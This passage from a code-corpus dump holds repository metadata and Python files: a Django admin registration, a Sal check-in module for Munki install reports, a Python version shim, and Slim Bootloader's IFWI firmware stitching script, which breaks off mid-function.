self.count.inc('Sum Weights', self.mchandles['GenInfo'].product().weight()) return True
true
true
f705c5f7c4974cac5efeddeb4787732c80472742
114
py
Python
blog/admin.py
EvaZogg/DjangoTranslationWebsite
3946c052547deed216332cb316f48fc70c09ff22
[ "BSD-2-Clause" ]
null
null
null
blog/admin.py
EvaZogg/DjangoTranslationWebsite
3946c052547deed216332cb316f48fc70c09ff22
[ "BSD-2-Clause" ]
null
null
null
blog/admin.py
EvaZogg/DjangoTranslationWebsite
3946c052547deed216332cb316f48fc70c09ff22
[ "BSD-2-Clause" ]
null
null
null
from django.contrib import admin from .models import blog # Register your models here. admin.site.register(blog)
19
32
0.798246
from django.contrib import admin from .models import blog admin.site.register(blog)
true
true
f705c6c1705b01df89f15b731ab6fc18b82c61cd
6,579
py
Python
payload/usr/local/sal/checkin_modules/munki_checkin.py
forvitinn/sal-scripts
585934f641732b29c0f0be9072b32606ccc8e96a
[ "Apache-2.0" ]
23
2015-08-04T22:56:55.000Z
2022-02-14T12:41:23.000Z
payload/usr/local/sal/checkin_modules/munki_checkin.py
forvitinn/sal-scripts
585934f641732b29c0f0be9072b32606ccc8e96a
[ "Apache-2.0" ]
40
2016-01-28T17:29:52.000Z
2021-11-12T04:22:48.000Z
payload/usr/local/sal/checkin_modules/munki_checkin.py
forvitinn/sal-scripts
585934f641732b29c0f0be9072b32606ccc8e96a
[ "Apache-2.0" ]
45
2015-08-04T00:12:28.000Z
2022-02-21T20:06:40.000Z
#!/usr/local/sal/Python.framework/Versions/Current/bin/python3 import datetime import pathlib import plistlib import sys import sal sys.path.insert(0, "/usr/local/munki") from munkilib import munkicommon __version__ = "1.2.0" def main(): # If we haven't successfully submitted to Sal, pull the existing # munki section rather than start from scratch, as we want to # keep any install/removal history that may be there. munki_submission = sal.get_checkin_results().get("munki", {}) munki_report = get_managed_install_report() extras = {} extras["munki_version"] = munki_report["MachineInfo"].get("munki_version") extras["manifest"] = munki_report.get("ManifestName") extras["runtype"] = munki_report.get("RunType", "custom") munki_submission["extra_data"] = extras munki_submission["facts"] = { "checkin_module_version": __version__, "RunType": munki_report["RunType"], "StartTime": munki_report["StartTime"], "EndTime": munki_report["EndTime"], } if munki_report.get("Conditions"): for condition, value in munki_report["Conditions"].items(): # Join lists of strings into a comma-delimited string, as # the server wants just text. try: if hasattr(value, "append"): value = ", ".join(value) except Exception as e: # We god something weird from a condtion that probably wouldn't work anyway continue munki_submission["facts"][condition] = value munki_submission["messages"] = [] for key in ("Errors", "Warnings"): for msg in munki_report[key]: # We need to drop the final 'S' to match Sal's message types. munki_submission["messages"].append( {"message_type": key.upper()[:-1], "text": msg} ) now = datetime.datetime.now().astimezone(datetime.timezone.utc).isoformat() # Process managed items and update histories. munki_submission["managed_items"] = {} optional_manifest = get_optional_manifest() for item in munki_report.get("ManagedInstalls", []): submission_item = {"date_managed": now} submission_item["status"] = "PRESENT" if item["installed"] else "PENDING" version_key = ( "version_to_install" if not item["installed"] else "installed_version" ) version = item[version_key] name = f'{item["name"]} {version}' submission_item["name"] = name # Pop off these two since we already used them. item.pop("name") item.pop("installed") item["type"] = "ManagedInstalls" self_serve = ( "True" if name in optional_manifest.get("managed_installs", []) else "False" ) item["self_serve"] = self_serve submission_item["data"] = item munki_submission["managed_items"][name] = submission_item for item in munki_report.get("managed_uninstalls_list", []): submission_item = {"date_managed": now, "status": "ABSENT"} self_serve = ( "True" if name in optional_manifest.get("managed_uninstalls", []) else "False" ) submission_item["data"] = { "self_serve": self_serve, "type": "ManagedUninstalls", } munki_submission["managed_items"][item] = submission_item # Process InstallResults and RemovalResults into update history for report_key in ("InstallResults", "RemovalResults"): for item in munki_report.get(report_key, []): # Skip Apple software update items. if item.get("applesus"): continue # Construct key; we pop the name off because we don't need # to submit it again when we stuff `item` into `data`. name = f'{item.pop("name")} {item["version"]}' submission_item = munki_submission["managed_items"].get( name, {"name": name} ) if item.get("status") != 0: # Something went wrong, so change the status. submission_item["status"] = "ERROR" if "data" in submission_item: submission_item["data"].update(item) else: submission_item["data"] = item if "type" not in submission_item["data"]: submission_item["data"]["type"] = ( "ManagedInstalls" if report_key == "InstallResults" else "ManagedUninstalls" ) # This UTC datetime gets converted to a naive datetime by # plistlib. Fortunately, we can just tell it that it's UTC. submission_item["date_managed"] = ( item["time"].replace(tzinfo=datetime.timezone.utc).isoformat() ) munki_submission["managed_items"][name] = submission_item sal.set_checkin_results("Munki", munki_submission) def get_managed_install_report(): """Return Munki ManagedInstallsReport.plist as a plist dict. Returns: ManagedInstalls report for last Munki run as a plist dict, or an empty dict. """ # Checks munki preferences to see where the install directory is set to. managed_install_dir = munkicommon.pref("ManagedInstallDir") # set the paths based on munki's configuration. managed_install_report = ( pathlib.Path(managed_install_dir) / "ManagedInstallReport.plist" ) try: munki_report = plistlib.loads(managed_install_report.read_bytes()) except (IOError, plistlib.InvalidFileException): munki_report = {} if "MachineInfo" not in munki_report: munki_report["MachineInfo"] = {} return sal.unobjctify(munki_report) def get_optional_manifest(): """Return Munki SelfServeManifest as a plist dict. Returns: SelfServeManifest for last Munki run as a plist dict, or an empty dict. """ # Checks munki preferences to see where the install directory is set to. managed_install_dir = munkicommon.pref("ManagedInstallDir") # set the paths based on munki's configuration. optional_manifest_path = ( pathlib.Path(managed_install_dir) / "manifests/SelfServeManifest" ) try: optional_manifest = plistlib.loads(optional_manifest_path.read_bytes()) except (IOError, plistlib.InvalidFileException): optional_manifest = {} return optional_manifest if __name__ == "__main__": main()
35.370968
91
0.622739
import datetime import pathlib import plistlib import sys import sal sys.path.insert(0, "/usr/local/munki") from munkilib import munkicommon __version__ = "1.2.0" def main(): # munki section rather than start from scratch, as we want to # keep any install/removal history that may be there. munki_submission = sal.get_checkin_results().get("munki", {}) munki_report = get_managed_install_report() extras = {} extras["munki_version"] = munki_report["MachineInfo"].get("munki_version") extras["manifest"] = munki_report.get("ManifestName") extras["runtype"] = munki_report.get("RunType", "custom") munki_submission["extra_data"] = extras munki_submission["facts"] = { "checkin_module_version": __version__, "RunType": munki_report["RunType"], "StartTime": munki_report["StartTime"], "EndTime": munki_report["EndTime"], } if munki_report.get("Conditions"): for condition, value in munki_report["Conditions"].items(): # Join lists of strings into a comma-delimited string, as # the server wants just text. try: if hasattr(value, "append"): value = ", ".join(value) except Exception as e: # We god something weird from a condtion that probably wouldn't work anyway continue munki_submission["facts"][condition] = value munki_submission["messages"] = [] for key in ("Errors", "Warnings"): for msg in munki_report[key]: munki_submission["messages"].append( {"message_type": key.upper()[:-1], "text": msg} ) now = datetime.datetime.now().astimezone(datetime.timezone.utc).isoformat() # Process managed items and update histories. munki_submission["managed_items"] = {} optional_manifest = get_optional_manifest() for item in munki_report.get("ManagedInstalls", []): submission_item = {"date_managed": now} submission_item["status"] = "PRESENT" if item["installed"] else "PENDING" version_key = ( "version_to_install" if not item["installed"] else "installed_version" ) version = item[version_key] name = f'{item["name"]} {version}' submission_item["name"] = name # Pop off these two since we already used them. item.pop("name") item.pop("installed") item["type"] = "ManagedInstalls" self_serve = ( "True" if name in optional_manifest.get("managed_installs", []) else "False" ) item["self_serve"] = self_serve submission_item["data"] = item munki_submission["managed_items"][name] = submission_item for item in munki_report.get("managed_uninstalls_list", []): submission_item = {"date_managed": now, "status": "ABSENT"} self_serve = ( "True" if name in optional_manifest.get("managed_uninstalls", []) else "False" ) submission_item["data"] = { "self_serve": self_serve, "type": "ManagedUninstalls", } munki_submission["managed_items"][item] = submission_item # Process InstallResults and RemovalResults into update history for report_key in ("InstallResults", "RemovalResults"): for item in munki_report.get(report_key, []): # Skip Apple software update items. if item.get("applesus"): continue # Construct key; we pop the name off because we don't need name = f'{item.pop("name")} {item["version"]}' submission_item = munki_submission["managed_items"].get( name, {"name": name} ) if item.get("status") != 0: submission_item["status"] = "ERROR" if "data" in submission_item: submission_item["data"].update(item) else: submission_item["data"] = item if "type" not in submission_item["data"]: submission_item["data"]["type"] = ( "ManagedInstalls" if report_key == "InstallResults" else "ManagedUninstalls" ) submission_item["date_managed"] = ( item["time"].replace(tzinfo=datetime.timezone.utc).isoformat() ) munki_submission["managed_items"][name] = submission_item sal.set_checkin_results("Munki", munki_submission) def get_managed_install_report(): # Checks munki preferences to see where the install directory is set to. managed_install_dir = munkicommon.pref("ManagedInstallDir") # set the paths based on munki's configuration. managed_install_report = ( pathlib.Path(managed_install_dir) / "ManagedInstallReport.plist" ) try: munki_report = plistlib.loads(managed_install_report.read_bytes()) except (IOError, plistlib.InvalidFileException): munki_report = {} if "MachineInfo" not in munki_report: munki_report["MachineInfo"] = {} return sal.unobjctify(munki_report) def get_optional_manifest(): managed_install_dir = munkicommon.pref("ManagedInstallDir") optional_manifest_path = ( pathlib.Path(managed_install_dir) / "manifests/SelfServeManifest" ) try: optional_manifest = plistlib.loads(optional_manifest_path.read_bytes()) except (IOError, plistlib.InvalidFileException): optional_manifest = {} return optional_manifest if __name__ == "__main__": main()
true
true
f705c7a4e86112d7fbf69a0db1bd54f293460d18
200
py
Python
jscaller/_compatiable.py
ZSAIm/PyJSCaller
086b3a0bf57f9c42c4d9c3cea6e7cdad5f52059d
[ "Apache-2.0" ]
31
2019-05-06T03:07:58.000Z
2022-02-09T02:00:46.000Z
jscaller/_compatiable.py
zackmark29/PyJSCaller
086b3a0bf57f9c42c4d9c3cea6e7cdad5f52059d
[ "Apache-2.0" ]
1
2019-07-05T12:43:34.000Z
2019-07-26T08:22:19.000Z
jscaller/_compatiable.py
zackmark29/PyJSCaller
086b3a0bf57f9c42c4d9c3cea6e7cdad5f52059d
[ "Apache-2.0" ]
10
2019-05-07T06:35:21.000Z
2021-09-27T02:48:40.000Z
__all__ = ["PY2", "PY3"] import sys if sys.version_info[0] == 2: PY2 = True PY3 = False elif sys.version_info[0] == 3: PY2 = False PY3 = True else: PY2 = False PY3 = False
12.5
30
0.56
__all__ = ["PY2", "PY3"] import sys if sys.version_info[0] == 2: PY2 = True PY3 = False elif sys.version_info[0] == 3: PY2 = False PY3 = True else: PY2 = False PY3 = False
true
true
f705c7f93432895a83a22e63702790a8a3602602
25,944
py
Python
Platform/ApollolakeBoardPkg/Script/StitchLoader.py
aimanrosli23/slimbootloader
bce49fbc5ac125cccf4f647e786409f49a026769
[ "BSD-2-Clause-NetBSD", "PSF-2.0", "BSD-2-Clause", "Apache-2.0", "MIT", "BSD-2-Clause-Patent" ]
1
2022-03-04T18:23:35.000Z
2022-03-04T18:23:35.000Z
Platform/ApollolakeBoardPkg/Script/StitchLoader.py
aimanrosli23/slimbootloader
bce49fbc5ac125cccf4f647e786409f49a026769
[ "BSD-2-Clause-NetBSD", "PSF-2.0", "BSD-2-Clause", "Apache-2.0", "MIT", "BSD-2-Clause-Patent" ]
null
null
null
Platform/ApollolakeBoardPkg/Script/StitchLoader.py
aimanrosli23/slimbootloader
bce49fbc5ac125cccf4f647e786409f49a026769
[ "BSD-2-Clause-NetBSD", "PSF-2.0", "BSD-2-Clause", "Apache-2.0", "MIT", "BSD-2-Clause-Patent" ]
null
null
null
## @ StitchLoader.py # This is a python stitching script for Slim Bootloader APL build # # Copyright (c) 2018 - 2022, Intel Corporation. All rights reserved. <BR> # SPDX-License-Identifier: BSD-2-Clause-Patent # ## import os import re import sys import struct import argparse import zipfile import shutil from ctypes import * from subprocess import check_output from functools import reduce sys.dont_write_bytecode = True sblopen_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../../')) if not os.path.exists (sblopen_dir): sblopen_dir = os.getenv('SBL_SOURCE', '') sys.path.append (os.path.join(sblopen_dir, 'BootloaderCorePkg' , 'Tools')) try: from IfwiUtility import * except ImportError: err_msg = "Cannot find IfwiUtility module!\n" err_msg += "Please make sure 'SBL_SOURCE' environment variable is set to open source SBL root folder." raise ImportError(err_msg) extra_usage_txt = \ """This script creates a new Apollo Lake Slim Bootloader IFWI image basing on an existing IFWI base image. Please note, this stitching method will work only if Boot Guard in the base image is not enabled, and the silicon is not fused with Boot Guard enabled. Please follow steps below: 1. Download an existing Apollo Lake UEFI IFWI image associated with the target platform, such as MinnowBoard 3, LeafHill, etc. The URL is below: https://firmware.intel.com/projects/minnowboard3 Alternatively, the original IFWI image from the onboard SPI flash can be read out as the base image too. 2. Build Slim Bootloader source tree and generate a stitching ZIP package. The generated ZIP package is located at: $(WORKSPACE)/Outputs/apl/Stitch_Components.zip 3. Stitch to create a new IFWI image. EX: python StitchLoader.py -i LEAFHILD.X64.0070.R01.1805070352.bin -s Stitch_Components.zip -o SlimBoot.bin 4. Optionally, to view the flash layout for an given IFWI image, specify '-i' option only. EX: python StitchLoader.py -i LEAFHILD.X64.0070.R01.1805070352.bin """ FILE_ALIGN = 0x1000 class IFWI_MANIPULATE: def add_component (self, root, path, before = '$', file_path = ''): nodes = path.split('/') parent_path = '/'.join(nodes[:-1]) dir_comp = IFWI_PARSER.locate_component (root, parent_path) if not dir_comp: print ('Cannot find DIR %s !' % '/'.join(nodes[:-1])) return -1 if dir_comp.type != COMPONENT.COMP_TYPE['PART']: print ('Can only add FILE type !') return -2 index = None if before == '$': # Add to end index = len(dir_comp.child) elif before == '^': # Add to top index = 0 else: for idx, file in enumerate(dir_comp.child): if before == file.name: index = idx if index is None: print ('Cannot find FILE %s !' % before) return -3 else: length = os.path.getsize(file_path) if file_path else 0x1000 comp = COMPONENT (nodes[-1], COMPONENT.COMP_TYPE['FILE'], 0, length) comp.set_data (file_path) dir_comp.add_child (comp, index) return 0 def remove_component (self, root, path): nodes = path.split('/') parent_path = '/'.join(nodes[:-1]) dir_comp = IFWI_PARSER.locate_component (root, parent_path) if not dir_comp: print ('Cannot find DIR %s !' % '/'.join(nodes[:-1])) return -1 if dir_comp.type != COMPONENT.COMP_TYPE['PART']: print ('Can only replace FILE type !') return -2 index = None for idx, file in enumerate(dir_comp.child): if file.name == nodes[-1]: index = idx break if index is None: print ('Cannot find FILE %s !' % path) return -3 else: del dir_comp.child[index] return 0 def replace_component (self, root, path, file_path): comp = IFWI_PARSER.locate_component (root, path) if not comp: print ('Cannot find FILE %s !' % path) return -1 if comp.type != COMPONENT.COMP_TYPE['FILE']: print ('Can only replace FILE type !' % path) return -2 comp.length = os.path.getsize(file_path) if file_path else 0x1000 if file_path: comp.set_data (file_path) return 0 def copy_component (self, root, path, ifwi_data): print ("COPY BP0 BPDT to BP1 BPDT ...") # Backup BP0 BPDT and BP1 SBPDT bp1 = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP1') bp0bpdt = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP0/BPDT') bp1bpdt = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP1/BPDT') bp1sbpdt = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP1/SBPDT') bp0bpdt_data = bytearray(ifwi_data[bp0bpdt.offset :bp0bpdt.offset + bp0bpdt.length]) bp1sbpdt_data = bytearray(ifwi_data[bp1sbpdt.offset:bp1sbpdt.offset + bp1sbpdt.length]) # Copy to BP0 BPDT to BP1 BPDT bp1sbpdt_offset = bp1bpdt.offset + bp0bpdt.length ifwi_data[bp1bpdt.offset:bp1sbpdt_offset] = bp0bpdt_data # Append original BP1 SBPDT bp1sbpdt_end_offset = bp1sbpdt_offset + bp1sbpdt.length ifwi_data[bp1sbpdt_offset:bp1sbpdt_end_offset] = bp1sbpdt_data padding = bp1.offset + bp1.length - bp1sbpdt_end_offset if padding < 0: print ('Insufficiant space in BP1 partition !') return -1 ifwi_data[bp1sbpdt_end_offset:bp1sbpdt_end_offset + padding] = b'\xff' * padding # Fix Sbpdt length in BP1 BPDT offset = bp1bpdt.offset bpdt_hdr = BPDT_HEADER.from_buffer(ifwi_data, offset) offset += sizeof(BPDT_HEADER) for idx in range(bpdt_hdr.desc_cnt): bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, offset) if "BpdtSbpdt" == str(bpdt_entry.type): bpdt_entry.sub_part_size = bp1sbpdt.length offset += sizeof(BPDT_ENTRY) # Fix Sbpdt headers offset = bp1sbpdt_offset bpdt_hdr = BPDT_HEADER.from_buffer(ifwi_data, offset) offset += sizeof(BPDT_HEADER) for idx in range(bpdt_hdr.desc_cnt): bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, offset) bpdt_entry.sub_part_offset += (bp0bpdt.length - bp1bpdt.length) offset += sizeof(BPDT_ENTRY) print ("Done!") return 0 def create_dir_data (self, dir, ifwi_data): # Claculate new DIR length and creaet new DIR data support_list = ["BpdtIbb", "BpdtObb"] if dir.name not in support_list: raise Exception ('Only %s are supported !' % ' '.join(support_list)) adjust = True offset = len(dir.child) * sizeof(SUBPART_DIR_ENTRY) + sizeof(SUBPART_DIR_HEADER) sub_dir_hdr = SUBPART_DIR_HEADER.from_buffer(ifwi_data, dir.offset) dir_data = bytearray(sub_dir_hdr) + b'\xff' * (offset - sizeof(SUBPART_DIR_HEADER)) for idx, comp in enumerate(dir.child): delta = 0 parts = os.path.splitext(comp.name) if len(parts) > 1 and parts[1] in ['.man', '.met']: align = 1 elif comp.name in ['IPAD', 'OPAD']: align = 0x40 else: align = FILE_ALIGN delta = dir.offset & (FILE_ALIGN - 1) next_offset = ((offset + delta + align - 1) & ~(align - 1)) count = next_offset - offset if adjust: adjust = False count -= delta dir_data.extend(b'\xff' * count) comp_data = comp.get_data() if comp_data: dir_data.extend(comp_data) else: dir_data.extend(ifwi_data[comp.offset : comp.offset + comp.length]) sub_dir = SUBPART_DIR_ENTRY() sub_dir.entry_name = comp.name.encode() sub_dir.entry_offset = next_offset - delta sub_dir.entry_size = comp.length sub_dir.reserved1 = 0 sub_dir.reserved2 = 0 entry_offset = idx * sizeof(SUBPART_DIR_ENTRY) + sizeof(SUBPART_DIR_HEADER) dir_data[entry_offset:entry_offset+sizeof(SUBPART_DIR_ENTRY)] = bytearray(sub_dir) next_offset += comp.length offset = next_offset align = FILE_ALIGN next_offset = ((offset + align - 1) & ~(align - 1)) dir_data.extend(b'\xff' * (next_offset - offset)) # Update checksum sub_dir_hdr = SUBPART_DIR_HEADER.from_buffer_copy(dir_data) sub_dir_hdr.num_of_entries = len(dir.child) sub_dir_hdr.checksum = 0 dir_data[:sizeof(SUBPART_DIR_HEADER)] = bytearray(sub_dir_hdr) length = sub_dir_hdr.num_of_entries * sizeof(SUBPART_DIR_ENTRY) + sizeof(SUBPART_DIR_HEADER) sum_buf = (c_uint8 * length).from_buffer_copy(dir_data) sub_dir_hdr.checksum = (~sum(sum_buf) + 1) & 0xFF dir_data[:sizeof(SUBPART_DIR_HEADER)] = bytearray(sub_dir_hdr) remaining = (dir.offset + len(dir_data)) & (FILE_ALIGN - 1) if remaining: # Not page aligned, add padding dir_data.extend(b'\xff' * (FILE_ALIGN - remaining)) return dir_data def refresh_ifwi_for_dir (self, dir, ifwi_data): # Claculate new DIR length and creaet new DIR data dir_data = self.create_dir_data (dir, ifwi_data) length = len (dir_data) adjust_length = length - dir.length if (dir.offset + length) & (FILE_ALIGN - 1): print ('DIR total size needs to be 4KB aligned !') # Remember original SBPDT offset org_bpdt_offset = dir.parent.parent.child[0].offset org_sbpdt_offset = dir.parent.parent.child[1].offset # Adjust offset and size for peer and up level in tree old_dir = dir while dir.type != COMPONENT.COMP_TYPE['BP']: for each in dir.parent.child: if each.offset > dir.offset: each.offset += adjust_length dir.length += adjust_length dir = dir.parent dir = old_dir # Update parent BPDT header info in IFWI data parent = dir.parent bpdt_hdr = BPDT_HEADER.from_buffer(ifwi_data, parent.offset) base = parent.offset + sizeof(BPDT_HEADER) found = False for idx in range(bpdt_hdr.desc_cnt): bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, base + idx * sizeof(BPDT_ENTRY)) comps = [x for x in parent.child if x.name == str(bpdt_entry.type)] if len(comps) == 0: continue if len(comps) > 1: raise Exception ('Found duplicated DIR %s !', bpdt_entry.type) bpdt_entry.sub_part_offset = comps[0].offset - parent.parent.offset if dir.name == str(bpdt_entry.type): bpdt_entry.sub_part_size = length found = True if not found: raise Exception ('Could not find DIR %s !', dir.name) # Update SBPDT DIR header in IFWI data bp_comp = parent.parent if parent.name == 'BPDT': bpdt_hdr = BPDT_HEADER.from_buffer (ifwi_data, org_sbpdt_offset) bpdt_hdr.xor_sum = 0 base_offset = org_sbpdt_offset + sizeof(BPDT_HEADER) for idx in range(bpdt_hdr.desc_cnt): bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, base_offset + idx * sizeof(BPDT_ENTRY)) bpdt_entry.sub_part_offset += adjust_length if (bpdt_entry.sub_part_offset + bpdt_entry.sub_part_size) > bp_comp.length: raise Exception ('Insufficiant space in layout !') else: # 'SBPDT', update length in BPDT bpdt_hdr = BPDT_HEADER.from_buffer (ifwi_data, org_bpdt_offset) bpdt_hdr.xor_sum = 0 base_offset = org_bpdt_offset + sizeof(BPDT_HEADER) for idx in range(bpdt_hdr.desc_cnt): bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, base_offset + idx * sizeof(BPDT_ENTRY)) if str(bpdt_entry.type) == "BpdtSbpdt": bpdt_entry.sub_part_size += adjust_length if (bpdt_entry.sub_part_offset + bpdt_entry.sub_part_size) > bp_comp.length: raise Exception ('Insufficiant space in layout !') # Generate actual final IFWI Data if adjust_length > 0: ifwi_data[:] = ifwi_data[:old_dir.offset] + dir_data + \ ifwi_data[old_dir.offset + old_dir.length - adjust_length : bp_comp.offset + bp_comp.length - adjust_length] + \ ifwi_data[bp_comp.offset + bp_comp.length:] else: adjust_length = -adjust_length ifwi_data[:] = ifwi_data[:old_dir.offset] + dir_data + \ ifwi_data[old_dir.offset + old_dir.length + adjust_length: bp_comp.offset + bp_comp.length] + \ b'\xff' * adjust_length + ifwi_data[bp_comp.offset + bp_comp.length:] return 0 def manipulate_ifwi (action, path, ifwi_data, file_name = '', before = '$'): print ('%s %s ...' % (action, path)) root = IFWI_PARSER.parse_ifwi_binary (ifwi_data) ifwi_op = IFWI_MANIPULATE() if action == "REMOVE": ret = ifwi_op.remove_component (root, path) elif action == "ADD": ret = ifwi_op.add_component (root, path, before, file_name) elif action == "REPLACE": ret = ifwi_op.replace_component (root, path, file_name) elif action == "COPY": ret = ifwi_op.copy_component (root, 'IFWI/BIOS/BP0/BPDT', ifwi_data) else: ret = -100 if ret == 0 and path: dir_path = '/'.join(path.split('/')[:-1]) dir = IFWI_PARSER.locate_component (root, dir_path) ifwi_op.refresh_ifwi_for_dir (dir, ifwi_data) print ('done!') return ret def patch_flash_map (image_data, platform_data = 0xffffffff): comp_bpdt_dict = { b'RSVD' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/RSVD", b'IAS1' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/FB", b'EPLD' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/EPLD", b'UVAR' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/UVAR", b'PYLD' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/PLD", b'VARS' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/VAR", b'MRCD' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/MRCD", b'CNFG' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/CFGD", b'KEYH' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/KEYH", b'FWUP' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/FWUP", b'SG02' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/OBB", b'SG1B' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/IBB", b'SG1A' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/IBBL", b'_BPM' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/BPM.met", } print ("Patching Slim Bootloader Flash Map table ...") output_image_data = image_data ifwi = IFWI_PARSER.parse_ifwi_binary (output_image_data) if not ifwi: return -1 pld = IFWI_PARSER.locate_component (ifwi, comp_bpdt_dict[b'PYLD']) if not pld: comp_bpdt_dict[b'PYLD'] = "IFWI/BIOS/BP1/SBPDT/BpdtObb/PLD" bp0 = IFWI_PARSER.locate_component (ifwi, 'IFWI/BIOS/BP0') bp1 = IFWI_PARSER.locate_component (ifwi, 'IFWI/BIOS/BP1') if not bp0 or not bp1: return -2 # Locate FlashMap offset for part in range(2): path = comp_bpdt_dict[b'SG1A'].replace("BP0", "BP%d" % part) comp = IFWI_PARSER.locate_component (ifwi, path) if not comp: if part == 0: raise Exception("Cannot locate %s !" % path) else: continue stage1AOffset = comp.offset stage1ALength = comp.length temp = stage1AOffset + stage1ALength - 8 c_uint32.from_buffer (output_image_data, temp - 4).value = platform_data fla_map_off = (bytes_to_value(output_image_data[temp:temp+4]) + stage1ALength) & 0xFFFFFFFF fla_map_str = FLASH_MAP.from_buffer (output_image_data, stage1AOffset + fla_map_off) entry_num = (fla_map_str.length - sizeof(FLASH_MAP)) // sizeof(FLASH_MAP_DESC) fla_map_str.romsize = bp0.length + bp1.length if part == 1: fla_map_str.attributes |= FLASH_MAP.FLASH_MAP_ATTRIBUTES['BACKUP_REGION'] for idx in range (entry_num): desc = FLASH_MAP_DESC.from_buffer (output_image_data, stage1AOffset + fla_map_off + sizeof(FLASH_MAP) + idx * sizeof(FLASH_MAP_DESC)) path = comp_bpdt_dict[desc.sig] if part == 1 or (desc.flags & FLASH_MAP.FLASH_MAP_DESC_FLAGS['NON_REDUNDANT']): path = path.replace("BP0", "BP1") if part == 1 and (desc.flags & FLASH_MAP.FLASH_MAP_DESC_FLAGS['REDUNDANT']): desc.flags |= FLASH_MAP.FLASH_MAP_DESC_FLAGS['BACKUP'] if desc.sig == b'RSVD': desc.offset = bp1.offset + bp1.length - desc.size - bp0.offset continue comp = IFWI_PARSER.locate_component (ifwi, path) if not comp: if desc.sig == b'KEYH': continue raise Exception("Cannot locate component '%s' in BPDT !" % path) if (desc.size == 0) and (desc.offset == 0): desc.size = comp.length desc.offset = comp.offset - bp0.offset continue if desc.size != comp.length and comp.name != 'FB': raise Exception("Mismatch component '%s' length in FlashMap and BPDT !" % comp_bpdt_dict[desc.sig]) if desc.sig not in [b'_BPM'] and (comp.offset & 0xFFF > 0): raise Exception("Component '%s' %x is not aligned at 4KB boundary, " \ "please adjust padding size for IPAD/OPAD in BoardConfig.py and rebuild !" % (comp_bpdt_dict[desc.sig], comp.offset)) desc.offset = comp.offset - bp0.offset # Last 4k in bios region is reserved for bootloader, throw Exception if any component falls in that range if (bp1.offset + bp1.length - 0x1000) <= (desc.offset + desc.size) <= (bp1.offset + bp1.length): raise Exception("Component '%s' offset is in bootloader reserved region, please try to reduce compoent size !" % comp_bpdt_dict[desc.sig]) limit = bp1.offset + bp1.length - bp0.offset - 0x40000 for idx in range (entry_num): desc = FLASH_MAP_DESC.from_buffer (output_image_data, stage1AOffset + fla_map_off + sizeof(FLASH_MAP) + idx * sizeof(FLASH_MAP_DESC)) if desc.sig == b'RSVD': continue # Last 256K flash space (4GB - 256KB to 4GB) is remapped to CSME read-only SRAM on APL # Directly access is not available. if desc.offset >= limit or desc.offset + desc.size > limit: print("WARNING: Component '%s' in BP%d is located inside CSME memory mapped region, direct access might fail." % (desc.sig, part)) print ("Flash map was patched successfully!") return 0 def create_ifwi_image (ifwi_in, ifwi_out, bios_out, platform_data, non_redundant, stitch_dir): redundant_payload = True ifwi_data = bytearray (get_file_data (ifwi_in)) root = IFWI_PARSER.parse_ifwi_binary (ifwi_data) if not root: raise Exception ('Invalid IFWI input image format !') # Verify if Boot Guard is enabled or not comp = IFWI_PARSER.locate_component (root, "IFWI/BIOS/BP0/BPDT/BpdtUepType") if not comp: raise Exception ('Unsupported base image format !') data = ifwi_data[comp.offset + 0x30:comp.offset + 0x32] if (data[0] & 0x0F) != 0x00: raise Exception ('Unsupported base image type. boot guard might have been enabled in this image !') print ('Creating %sredundant image ...' % ('non-' if non_redundant else '')) # Remove all in IBB/OBB remove_list = [ "IFWI/BIOS/BP0/BPDT/BpdtIbb", "IFWI/BIOS/BP1/BPDT/BpdtIbb", "IFWI/BIOS/BP1/SBPDT/BpdtObb" ] for dir_path in remove_list: comp = IFWI_PARSER.locate_component (root, dir_path) if not comp: continue for each in comp.child: if each.name.endswith('.man') or each.name.endswith('.met'): continue ret = manipulate_ifwi ('REMOVE', dir_path + '/' + each.name, ifwi_data) if ret != 0: raise Exception ('REMOVE failed (error code %d) !' % (ret)) # Copy BP0 BPDT into BP1 BPDT if not non_redundant: ret = manipulate_ifwi ('COPY', '', ifwi_data) if ret != 0: raise Exception ('COPY failed (error code %d) !' % (ret)) if stitch_dir: ibb_list = [ ('IBBL' , 'IBBL'), ('IBB' , 'IBBM'), ('OBB' , 'OBB'), ('FWUP' , 'FWU'), ('CFGD' , 'CFGDATA'), ('KEYH' , 'KEYHASH'), ('VAR' , 'VAR'), ('MRCD' , 'MRCDATA'), ('PLD' , 'PLD'), ] obb_list = [ ('FB' , 'FB'), ('EPLD' , 'EPLD'), ('UVAR' , 'UVAR'), ('PLD' , 'PLD'), ] # optional components opt_list = [ 'EPLD', 'UVAR' ] if redundant_payload: del obb_list[-1] else: del ibb_list[-1] bp1sbpdt = "IFWI/BIOS/BP1/SBPDT/BpdtObb/" loop = 1 if non_redundant else 2 for bp in range(loop): dir = "IFWI/BIOS/BP%d/BPDT/BpdtIbb/" % bp for comp_name, file_name in ibb_list: file_path = os.path.join(stitch_dir, 'Stitch_%s.bin' % file_name) ret = manipulate_ifwi ('ADD', dir + comp_name, ifwi_data, file_path) if ret != 0: raise Exception ('ADD failed (error code %d) !' % (ret)) for comp_name, file_name in obb_list: if file_name == '': file_path = '' else: file_path = os.path.join(stitch_dir, 'Stitch_%s.bin' % file_name) if (comp_name in opt_list) and not os.path.exists(file_path): ret = 0 else: ret = manipulate_ifwi ('ADD', bp1sbpdt + comp_name, 